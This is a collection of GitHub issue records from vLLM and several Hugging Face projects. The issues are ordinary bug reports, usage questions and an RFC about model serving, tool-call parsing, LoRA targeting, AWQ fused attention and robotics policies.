Thus I would like to use two V100s in DP at the first PP stage.\nIs this possible with the current released vLLM version?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27778", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-30T02:05:06Z", "updated_at": "2025-10-30T02:05:06Z", "comments": 0, "user": "oldcpple" }, { "repo": "vllm-project/vllm", "number": 27746, "title": "[Bug]: `strict` value in function definitions causes request error when using Mistral tokenizer", "body": "### Your current environment\n\nTested with latest vllm source build from main\n\n### \ud83d\udc1b Describe the bug\n\nStart vLLM with a model that uses the mistral tokenizer:\n\n```\nvllm serve mistralai/Mistral-Small-24B-Instruct-2501 \\\n --enable-auto-tool-choice \\\n --tool-call-parser mistral \\\n --tokenizer-mode mistral\n```\n\nSend a simple tool call request with the `strict` parameter set to a value of `False`:\n\n```python\nfrom openai import OpenAI\n\nclient = OpenAI(base_url=\"http://localhost:8000/v1\", api_key=\"fake\")\n\ntools = [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_current_time\",\n \"description\": \"Get the current time in UTC\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {},\n \"required\": []\n },\n \"strict\": False,\n }\n },\n]\nmodel = client.models.list().data[0].id\nresponse = client.chat.completions.create(\n model=model,\n messages=[{\"role\": \"user\", \"content\": \"What is the current time?\"}],\n tools=tools,\n)\nprint(\"Success!\")\n```\n\nThe request fails with a 400 error like:\n\n`openai.BadRequestError: Error code: 400 - {'error': {'message': '1 validation error for Tool\\nfunction.strict\\n Extra inputs are not permitted [type=extra_forbidden, input_value=False, input_type=bool]\\n For further information visit https://errors.pydantic.dev/2.12/v/extra_forbidden 1 validation error for Tool\\nfunction.strict\\n Extra inputs are not permitted [type=extra_forbidden, input_value=False, input_type=bool]\\n For further information visit https://errors.pydantic.dev/2.12/v/extra_forbidden', 'type': 'BadRequestError', 'param': None, 'code': 400}}`\n\nStart vLLM without the mistral tokenizer and the request succeeds.\n\nNote that this is explicitly NOT about making `strict=True` actually enforce structured outputs. The scope of this is simply to not return a validation error when this parameter is passed with any valid value when the `mistral` tokenizer is in use. 
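(For anyone needing a stopgap in the meantime, a client-side workaround is to strip the field before sending; this is hypothetical mitigation code, not the fix being requested here:)\n```python\n# Drop 'strict' from every function definition before issuing the request.\nfor tool in tools:\n    tool.get('function', {}).pop('strict', None)\n```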
The current behavior breaks some client frameworks that always pass this value, even when it has a value of `False`.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27746", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-29T14:33:13Z", "updated_at": "2025-10-30T19:14:50Z", "comments": 4, "user": "bbrowning" }, { "repo": "huggingface/trl", "number": 4368, "title": "GKD: multimodal inputs?", "body": "Does the Generalized Knowledge Distillation trainer (GKDTrainer) support multimodal inputs (VLMs)?\nIf yes, what's the expected dataset format? There is no example of this in the documentation.\n\nThanks!", "url": "https://github.com/huggingface/trl/issues/4368", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2753 question", "\ud83c\udfcb GKD" ], "created_at": "2025-10-29T14:08:44Z", "updated_at": "2025-11-07T19:26:23Z", "comments": 2, "user": "e-zorzi" }, { "repo": "huggingface/lerobot", "number": 2338, "title": "policy gr00t not found when doing async inference with gr00t", "body": "### System Info\n\n```Shell\nlerobot version: \n3f8c5d98 (HEAD -> main, origin/main, origin/HEAD) fix(video_key typo): fixing video_key typo in update_video_info (#2323)\n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nI have installed the following packages:\n\npip install \"torch>=2.2.1,<2.8.0\" \"torchvision>=0.21.0,<0.23.0\" # --index-url https://download.pytorch.org/whl/cu1XX\npip install ninja \"packaging>=24.2,<26.0\" # flash attention dependencies\npip install \"flash-attn>=2.5.9,<3.0.0\" --no-build-isolation\npython -c \"import flash_attn; print(f'Flash Attention {flash_attn.__version__} imported successfully')\"\n\npip install lerobot[groot]\n\nThen I ran the async inference server:\npython -m lerobot.async_inference.policy_server \\\n --host=127.0.0.1 \\\n --port=8080\n\nWhen the async inference client sends the policy gr00t, the server complains that groot is not available, as below:\n\nERROR 2025-10-29 05:30:24 /_server.py:636 Exception calling application: Policy type groot not supported.
Supported policies: ['act', 'smolvla', 'diffusion', 'tdmpc', 'vqbet', 'pi0', 'pi05']\n\n\nFine-tuning a pi05 model works fine with the same code.\nAny idea why this happens?\n\n\n\n\n\n### Expected behavior\n\nIt should not complain about a missing groot policy\n\n", "url": "https://github.com/huggingface/lerobot/issues/2338", "state": "closed", "labels": [ "bug", "question", "policies" ], "created_at": "2025-10-29T05:36:20Z", "updated_at": "2025-11-21T15:34:21Z", "user": "jcl2023" }, { "repo": "huggingface/lerobot", "number": 2337, "title": "Can I continue reinforcement learning in HIL-SERL using a pi0", "body": "Can I continue reinforcement learning in HIL-SERL using a pi0 model from LERobot that has been fine-tuned via imitation learning?", "url": "https://github.com/huggingface/lerobot/issues/2337", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-10-29T04:30:26Z", "updated_at": "2025-11-11T03:13:23Z", "user": "pparkgyuhyeon" }, { "repo": "huggingface/peft", "number": 2878, "title": "peft \" target_modules='all-linear' \" has different behavior between x86 and aarch?", "body": "### System Info\n\nI have tested on two architectures (x86, ARM) and found this bug.\nBoth architectures have peft==0.17.1\n\n### Who can help?\n\n@benjaminbossan @githubnemo\n\n### Reproduction\n\nReproduction script: bug_reprod.py\n```python\nfrom transformers import AutoModelForImageTextToText\n\nmodel = AutoModelForImageTextToText.from_pretrained(\"OpenGVLab/InternVL3_5-1B-HF\", trust_remote_code=True)\nlm_head = model.lm_head\nmodel = model.language_model\nmodel.lm_head = lm_head\n\nfrom peft import get_peft_model\nfrom peft import LoraConfig\n\npeft_config = LoraConfig(\n inference_mode=False, \n r=12,\n target_modules=\"all-linear\",\n)\nbug_model = get_peft_model(model, peft_config)\nbug_model.print_trainable_parameters()\nbreakpoint() # p bug_model, you will find lm_head has different results\n```\nPut bug_reprod.py on x86 and aarch machines and run it; you will find different results on lm_head!\nThe following figures show the error:\n\n#### x86\n\"Image\"\n \n#### aarch\n\"Image\"\n\n### Expected behavior\n\n`target_modules='all-linear'` should exclude lm_head in lora tuning.
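(A possible workaround while this is investigated, assuming PEFT >= 0.14 where `LoraConfig` exposes `exclude_modules`; a sketch only:)\n```python\nfrom peft import LoraConfig\n\n# Explicitly keep lm_head out of the adapter, regardless of what 'all-linear' matches.\npeft_config = LoraConfig(\n    inference_mode=False,\n    r=12,\n    target_modules='all-linear',\n    exclude_modules=['lm_head'],\n)\n```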
At the very least, the x86 and ARM architectures should have identical behavior.\n\n", "url": "https://github.com/huggingface/peft/issues/2878", "state": "closed", "labels": [], "created_at": "2025-10-29T03:43:02Z", "updated_at": "2025-12-07T15:03:33Z", "comments": 4, "user": "HuangChiEn" }, { "repo": "huggingface/peft", "number": 2877, "title": "peft config 'all-linear' includes lm_head, is there any way to remove it?", "body": "I'm not sure if it is a bug or whether my modification affects peft.\n> since some issues reveal that 'all-linear' should not include the lm_head\n```python\nif 'internvl' in self.variant.lower():\n if '3_5' in self.variant:\n self.model = AutoModelForImageTextToText.from_pretrained(self.variant, trust_remote_code=True)\n # internvl3.5, lm_head is not part of language_model !?\n lm_head = self.model.lm_head\n self.model = self.model.language_model\n self.model.lm_head = lm_head\n\n# then \nfrom peft import get_peft_model\nfrom peft import LoraConfig\n \nprint('Using PEFT model')\npeft_config = LoraConfig(\n inference_mode=False, \n r=self.lora_r,\n lora_alpha=self.lora_alpha,\n lora_dropout=self.lora_dropout,\n target_modules=\"all-linear\",\n)\nself.model = get_peft_model(self.model, peft_config)\n```\nIf the modification does affect the peft config, is there any way to exclude the lm_head via LoraConfig?\n\npeft version: 0.17.0\nCan anyone kindly give me some suggestions? \nMany thanks!\n\n---\n\nUpdate: \nDoes peft have different behavior between x86 and aarch?\n\nError message while loading the pretrained weights: \n\"Image\"\n\n#### x86 arch, normal\n\"Image\"\n\n#### aarch, bug occurs\n\"Image\"", "url": "https://github.com/huggingface/peft/issues/2877", "state": "closed", "labels": [], "created_at": "2025-10-29T02:19:21Z", "updated_at": "2025-10-29T03:43:20Z", "comments": 1, "user": "HuangChiEn" }, { "repo": "huggingface/lerobot", "number": 2335, "title": "How to Visualize All Episodes of a LeRobot Dataset Locally?", "body": "Hi everyone, I have a question about LeRobot datasets. I'd like to inspect my data locally, but using the command\n_lerobot-dataset-viz --repo-id=${HF_USER}/record-test --episode-index=0_\nonly allows me to view one episode at a time, which is quite cumbersome.\n\nIs there a way to visualize all episodes of a dataset locally\u2014similar to [visualize dataset online](https://huggingface.co/spaces/lerobot/visualize_dataset), \nwhere I can easily browse through all episodes?\n\nThanks!", "url": "https://github.com/huggingface/lerobot/issues/2335", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-10-29T02:01:01Z", "updated_at": "2025-12-29T12:18:57Z", "user": "Vacuame" }, { "repo": "vllm-project/vllm", "number": 27692, "title": "it runs on rtx 5060 ti 16 gb", "body": "### Your current environment\n\n\nhttps://github.com/bokkob556644-coder/suc-vllm-rtx-5060-ti-16-gb/blob/main/suc_vllm.txt\n\n### How would you like to use vllm\n\n[I want to run inference of a [specific model](put link here).
I don't know how to integrate it with vllm.\n](https://github.com/bokkob556644-coder/suc-vllm-rtx-5060-ti-16-gb/blob/main/suc_vllm.txt)\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27692", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-28T21:43:00Z", "updated_at": "2025-10-28T21:43:16Z", "comments": 1, "user": "bokkob556644-coder" }, { "repo": "huggingface/transformers", "number": 41919, "title": "LFM2 image_processing_lfm2_vl_fast.py Mean Std swapped?", "body": "### System Info\n\nIn LFM2-VL image_processing_lfm2_vl_fast.py line 212 following the MEAN and STD from imagenet is used for preprocessing.\nHowever it seems like they are swapped:\n image_mean = IMAGENET_STANDARD_STD\n image_std = IMAGENET_STANDARD_MEAN\n\nor is this correct ?\n\n### Who can help?\n\n@Cyrilvallez \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nHave a look at https://github.com/huggingface/transformers/blob/main/src/transformers/models/lfm2_vl/image_processing_lfm2_vl_fast.py\n\n### Expected behavior\n\nNot optimized VLM Behaviour", "url": "https://github.com/huggingface/transformers/issues/41919", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-28T16:17:44Z", "updated_at": "2025-10-31T15:02:40Z", "comments": 4, "user": "florianvoss-commit" }, { "repo": "vllm-project/vllm", "number": 27667, "title": "[Usage]: DeepseekOCR on CPU missing implementation for fused_topk", "body": "### Your current environment\n\nTry to test if it is possible to run DeepseekOCR on CPU using current git main branch.\n\nFails because there is no implementation of `fused_topk` for CPU.\n\n```\nINFO 10-28 15:41:18 [v1/worker/cpu_model_runner.py:77] Warming up model for the compilation...\nERROR: Traceback (most recent call last):\n File \"/opt/venv/lib/python3.12/site-packages/starlette/routing.py\", line 677, in lifespan\n async with self.lifespan_context(app) as maybe_state:\n ^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/starlette/routing.py\", line 566, in __aenter__\n await self._router.startup()\n File \"/opt/venv/lib/python3.12/site-packages/starlette/routing.py\", line 654, in startup\n await handler()\n File \"/app/start_server.py\", line 161, in startup_event\n initialize_model()\n File \"/app/start_server.py\", line 84, in initialize_model\n llm = LLM(\n ^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/entrypoints/llm.py\", line 336, in __init__\n self.llm_engine = LLMEngine.from_engine_args(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/engine/llm_engine.py\", line 188, in from_engine_args\n return cls(\n ^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/engine/llm_engine.py\", line 122, in __init__\n self.engine_core = EngineCoreClient.make_client(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/engine/core_client.py\", line 95, in make_client\n return InprocClient(vllm_config, executor_class, log_stats)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File 
\"/opt/venv/lib/python3.12/site-packages/vllm/v1/engine/core_client.py\", line 264, in __init__\n self.engine_core = EngineCore(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 109, in __init__\n num_gpu_blocks, num_cpu_blocks, kv_cache_config = self._initialize_kv_caches(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 234, in _initialize_kv_caches\n self.model_executor.initialize_from_config(kv_cache_configs)\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/executor/abstract.py\", line 113, in initialize_from_config\n self.collective_rpc(\"compile_or_warm_up_model\")\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/executor/uniproc_executor.py\", line 73, in collective_rpc\n return [run_method(self.driver_worker, method, args, kwargs)]\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/serial_utils.py\", line 459, in run_method\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/worker/cpu_worker.py\", line 105, in compile_or_warm_up_model\n self.model_runner.warming_up_model()\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/worker/cpu_model_runner.py\", line 80, in warming_up_model\n self._dummy_run(\n File \"/opt/venv/lib/python3.12/site-packages/torch/utils/_contextlib.py\", line 120, in decorate_context\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/worker/gpu_model_runner.py\", line 3464, in _dummy_run\n outputs = self.model(\n ^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1773, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1784, in _call_impl\n return forward_call(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/model_executor/models/deepseek_ocr.py\", line 582, in forward\n hidden_states = self.language_model(\n ^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1773, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1784, in _call_impl\n return forward_call(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/model_executor/models/deepseek.py\", line 495, in forward\n hidden_states = self.model(\n ^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1773, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1784, in _call_impl\n return forward_call(*args, **kwargs)\n ", "url": "https://github.com/vllm-project/vllm/issues/27667", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-28T16:14:40Z", "updated_at": "2025-10-28T16:14:40Z", "comments": 0, "user": "brainlag" }, { "repo": "vllm-project/vllm", "number": 27661, "title": "[RFC]: Consolidated tool call parser implementations by type (JSON, Python, XML, Harmony)", "body": "### Motivation.\n\nWhen someone wants to add a new tool call parser today, they 
typically choose an existing tool call parser that looks close to what is needed, copy it into a new file, and adjust things here and there as needed for their specific model. Sometimes tests get added, and sometimes not. Sometimes the changes to the copied parser make meaningful fixes, and sometimes the changes to the copied parser add bugs.\n\nGenerally, we have a few buckets of tool call parsers based on the format the models are trained to output - JSON, Python, XML, or Harmony style tool calls. But we have N different implementations of streaming partial JSON parsing, N different Python parsing implementations, and so on. Instead of multiple copies of each of those, ideally we'd maintain one high-quality implementation for streaming partial JSON parsing that's extensible enough to handle the needs of individual model differences.\n\n### Proposed Change.\n\nThe overall change I propose is a refactoring of the existing tool call parsers, lowering the burden to add a new tool call parser, reducing the maintenance and bug permutations possible, and providing us higher test coverage of all tool call parsers so we can systematically track and fix bugs as reported in one place.\n\nGeneral steps proposed:\n\n**Test coverage**\n\nBefore starting any refactor, the focus will be on building confidence in the existing state of all our tool call parsers by adding and extending their test suites.\n\n- [ ] Add a new common tool call parser unit test suite for all tool call parsers lacking any tests\n - #27599\n- [ ] Reorganize existing tool call parser tests to cleanly separate unit tests that just need a tokenizer from integration tests that need actual running inference servers.\n - Today we have `tests/tool_use` that is mostly integration tests, and `tests/entrypoints/openai/tool_parsers` that is mostly unit tests, but there's a mix of each in both. The plan is to move integration tests to `tests/tool_use` since that's where most of those live, and keep unit tests in `tests/entrypoints/openai/tool_parsers`, where they can all be run without an accelerator and execute quickly.\n- [ ] Review the history of each tool call parser, bugs filed against that tool call parser, and special statements in the code of each tool parser to identify special case handling. Create a test for each of these special cases.\n- [ ] Refactor existing tool call parser tests to use the common test suite for all tool call parsers while retaining any model-specific tests required by the previous review of parsers.\n- [ ] File issues of type bug for every test in the common suite that is marked as \"expected fail\" for various tool call parsers. There will be a number of these, with tool call parsers that do not meet the standards of the common suite today. These represent low-hanging fruit for us to find and fix for each parser.\n - Some fixes may be trivial, and can happen before consolidating implementations just to incrementally raise the quality of our parsers. Some fixes may not be trivial, and may only happen after consolidating implementations.\n\n**Refactoring and consolidation**\n\nAfter we have the expanded test suite, we'll have the confidence to undertake this refactor without introducing a lot of new bugs, as each parser has some bespoke logic today that needs to be accounted for.\n\n- [ ] Consolidate all the partial and streaming JSON parsing logic into a central place that every JSON-style tool call parser consumes. 
Ensure there are no test regressions.\n- [ ] Consolidate all the partial and streaming Python parsing logic into a central place that every Python-style tool call parser consumes.\n\n**Post-consolidation bug squashing and docs**\n\n- [ ] Remove any remaining `xfail` markers in the test suite across all tool parser test suites.\n- [ ] Update contributor docs that discuss how to add a new tool call parser, how to reuse the common logic for JSON, Python, XML, etc. parsing instead of writing new ones, and how to use the new common test suite to simplify testing of the new parser. \n\n### Feedback Period.\n\nThis is ongoing work and feedback is accepted at any time while this issue is open. Initial stages of expanding our test coverage have already started, but there's at least a couple of weeks to provide feedback before work gets to the point of actually refactoring and consolidating the tool call parsers.\n\n### CC List.\n\n_No response_\n\n### Any Other Things.\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27661", "state": "open", "labels": [ "RFC" ], "created_at": "2025-10-28T14:54:10Z", "updated_at": "2025-10-30T16:14:09Z", "comments": 2, "user": "bbrowning" }, { "repo": "huggingface/lerobot", "number": 2329, "title": "smolvla base model (the VLM part) to other model", "body": "Can I change the smolvla base model (the VLM part) to another model?\nWhat should I do?\nThanks", "url": "https://github.com/huggingface/lerobot/issues/2329", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-10-28T12:28:44Z", "updated_at": "2025-10-31T15:09:12Z", "user": "smartparrot" }, { "repo": "vllm-project/vllm", "number": 27649, "title": "[Usage]: Qwen3-32B on RTX PRO 6000 (55s First Token Delay and 15t/s)", "body": "Why does the Qwen3-32B model take 55 seconds before producing the first token, and why is the generation speed only 15t/s?\n\nMy vLLM configuration:\n\nDevice: GB202GL [RTX PRO 6000 Blackwell Server Edition]\n\nNvidia Driver Version: 580.95.05\nCUDA Version: 13.0\n\nDocker configuration: \n\n```sh\nPORT=8085\nMODEL_PATH=Qwen/Qwen3-32B\nSERVED_MODEL_NAME=vLLM-Qwen3-32B\n\ndocker run -d \\\n --runtime nvidia \\\n --gpus all \\\n -v /data/projects/docker/vllm/.cache/huggingface:/root/.cache/huggingface \\\n -p $PORT:8000 \\\n --env \"HUGGING_FACE_HUB_TOKEN=$HUGGING_FACE_HUB_TOKEN\" \\\n --name $SERVED_MODEL_NAME \\\n --restart unless-stopped \\\n --ipc=host \\\n vllm/vllm-openai:v0.11.0 \\\n --model /root/.cache/huggingface/$MODEL_PATH \\\n --served-model-name $SERVED_MODEL_NAME \\\n --dtype bfloat16 \\\n --gpu-memory-utilization 0.92 \\\n --max-model-len 32768 \\\n --max-num-seqs 64 \\\n --tensor-parallel-size 1 \\\n --api-key sk-vx023nmlrtTmlC\n```", "url": "https://github.com/vllm-project/vllm/issues/27649", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-28T10:49:43Z", "updated_at": "2025-11-07T02:30:26Z", "comments": 4, "user": "yizhitangtongxue" }, { "repo": "vllm-project/vllm", "number": 27646, "title": "[Usage]: How to use vllm bench serve to bench remote deployed vllm models (can't bench when ep enabled!!!)", "body": "### Your current environment\n\nI deployed DeepSeek-V3 on a remote server using:\n```\nexport VLLM_USE_V1=1\nexport 
VLLM_ALL2ALL_BACKEND=deepep_low_latency\nvllm serve /models/hf/models--deepseek-ai--DeepSeek-V3 --tensor-parallel-size 1 --data-parallel-size 8 --enable-expert-parallel --no-enforce-eager --load-format dummy\n```\n\nAnd on another server:\n```\nVLLM_USE_V1=1 vllm bench serve --model /models/hf/models--deepseek-ai--DeepSeek-V3/ --endpoint /v1/completions --dataset-name sharegpt --dataset-path /datasets/ShareGPT/ShareGPT_V3_unfiltered_cleaned_split.json --num-prompts 10 --ready-check-timeout-sec 0 --ip 10.102.212.22 --port 8000 \n```\nwhere 10.102.212.22 is the server IP and 8000 is the default port.\n\nAnd I got the error below on the server:\n```\n\"POST /v1/completions HTTP/1.1\" 404 Not Found\n```\n\n\n### How would you like to use vllm\n\nI want to run inference of DeepSeek-V3.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27646", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-28T09:56:37Z", "updated_at": "2025-10-28T15:23:06Z", "comments": 3, "user": "Valerianding" }, { "repo": "huggingface/transformers", "number": 41910, "title": "Breaking change about AWQ Fused modules due to Attention Refactor", "body": "### System Info\n\ntransformers==5.0.0dev\nautoawq==0.2.9\nautoawq_kernels==0.0.9\ntorch==2.6.0+cu124\n\n### Who can help?\n\nDue to PR #35235, `past_key_values` is no longer a returned value of attention modules.\n\nHowever, when using AWQ models with Fused modules [AWQ Fused modules docs](https://huggingface.co/docs/transformers/main/en/quantization/awq#fused-modules), there will be an error like in issue #38554\n\n```bash\n hidden_states, _ = self.self_attn(\nValueError: too many values to unpack (expected 2)\n```\n\nSo we can hack `awq.modules.fused.attn.QuantAttentionFused` to avoid returning `past_key_values`. Therefore, I created a preliminary PR #41909 to fix it.\n\nHowever, for special `rope_type` values such as LLaMA3, the RoPE implementation in AutoAWQ will cause an error, since `awq.modules.fused.attn.RoPE` supports the default RoPE only.\n\nMaybe we can implement and maintain `AwqRoPE` and `AwqQuantAttentionFused` in `transformers.integrations.awq`? 
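For the first option, here is a rough sketch of what such a shim could look like (`QuantAttentionFused` is the existing AutoAWQ class; the subclass below is only an illustration, not the actual PR):\n\n```python\nfrom awq.modules.fused.attn import QuantAttentionFused\n\n\nclass AwqQuantAttentionFused(QuantAttentionFused):\n    # Adapt the old AutoAWQ return value to the refactored attention contract.\n    def forward(self, hidden_states, *args, **kwargs):\n        # AutoAWQ returns (attn_output, attn_weights, past_key_value), but\n        # post-refactor transformers unpacks only two values.\n        outputs = super().forward(hidden_states, *args, **kwargs)\n        return outputs[0], outputs[1]\n```\n\n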
Or we can maintain `huggingface/AutoAWQ`, as `casper-hansen/AutoAWQ` is archived.\n\nI'd like to refine my PR to help transformers fix this bug!\n\n@SunMarc @MekkCyber\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\n\nfrom transformers import AwqConfig, AutoModelForCausalLM, AutoTokenizer\n\n\n# model_path = \"./llama-3.1-8b-instruct-awq\"\nmodel_path = \"./qwen2.5-7b-instruct-awq\"\n# model_path = \"./qwen3-8b-awq\"\n\nawq_config = AwqConfig(\n bits=4,\n do_fuse=True,\n fuse_max_seq_len=8192\n)\n\nmodel = AutoModelForCausalLM.from_pretrained(model_path, quantization_config=awq_config).to(\"cuda:0\")\nprint(model)\ntokenizer = AutoTokenizer.from_pretrained(model_path)\n\nmax_new_tokens = 1024 if \"qwen3\" in model_path else 32\n\n\nmessages = []\n\nprompt1 = \"What is the result of 3+5?\"\nmessages.append({\"role\": \"user\", \"content\": prompt1})\ntext1 = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)\ninputs1 = tokenizer(text1, return_tensors=\"pt\").to(\"cuda:0\")\n\ngenerated_ids1 = model.generate(**inputs1, max_new_tokens=max_new_tokens)\noutput_ids1 = generated_ids1[0, len(inputs1.input_ids[0]) :].tolist()\noutput1 = tokenizer.decode(output_ids1, skip_special_tokens=True)\nmessages.append({\"role\": \"assistant\", \"content\": output1})\nprint(\"Output 1:\", output1)\n\nprompt2 = \"What about adding 10 to that result?\"\nmessages.append({\"role\": \"user\", \"content\": prompt2})\ntext2 = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)\ninputs2 = tokenizer(text2, return_tensors=\"pt\").to(\"cuda:0\")\n\ngenerated_ids2 = model.generate(**inputs2, max_new_tokens=max_new_tokens)\noutput_ids2 = generated_ids2[0, len(inputs2.input_ids[0]) :].tolist()\noutput2 = tokenizer.decode(output_ids2, skip_special_tokens=True)\nmessages.append({\"role\": \"assistant\", \"content\": output2})\nprint(\"Output 2:\", output2)\n\n```\n\n### Expected behavior\n\nThere is no error.", "url": "https://github.com/huggingface/transformers/issues/41910", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-28T08:29:03Z", "updated_at": "2025-11-20T13:41:34Z", "comments": 3, "user": "fanqiNO1" }, { "repo": "vllm-project/vllm", "number": 27636, "title": "[Usage]: How to preserve qwen3-vl special tokens in vllm", "body": "### Your current environment\n\nThe grounding format of my fine-tuned qwen3-vl model is: <|object_ref_start|>图片<|object_ref_end|><|box_start|>(x1,y1),(x2,y2)<|box_end|>\nThe format produced by vllm serve inference is: 图片(460,66),(683,252). Does this mean the special tokens are simply dropped, and is there a way to preserve them?\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). 
I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27636", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-28T06:52:16Z", "updated_at": "2025-10-28T06:52:16Z", "comments": 0, "user": "qfs666" }, { "repo": "huggingface/diffusers", "number": 12553, "title": "Reason to move from OpenCV to ffmpeg", "body": "I see that `diffusers.utils.export_to_video()` encourages ffmpeg usage instead of OpenCV. Can you share the reason? I'm looking for a way to add video decoding to my project so I'm collecting arguments.", "url": "https://github.com/huggingface/diffusers/issues/12553", "state": "open", "labels": [], "created_at": "2025-10-28T06:49:48Z", "updated_at": "2025-11-07T13:27:03Z", "comments": 10, "user": "Wovchena" }, { "repo": "vllm-project/vllm", "number": 27634, "title": "[Usage]: how to use --quantization option of `vllm serve`?", "body": "### Your current environment\n\n```text\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu129\nIs debug build : False\nCUDA used to build PyTorch : 12.9\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.12 (main, Aug 15 2025, 14:32:43) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-5.15.0-160-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 11.5.119\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : GPU 0: NVIDIA GeForce RTX 4090 D\nNvidia driver version : 570.195.03\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs 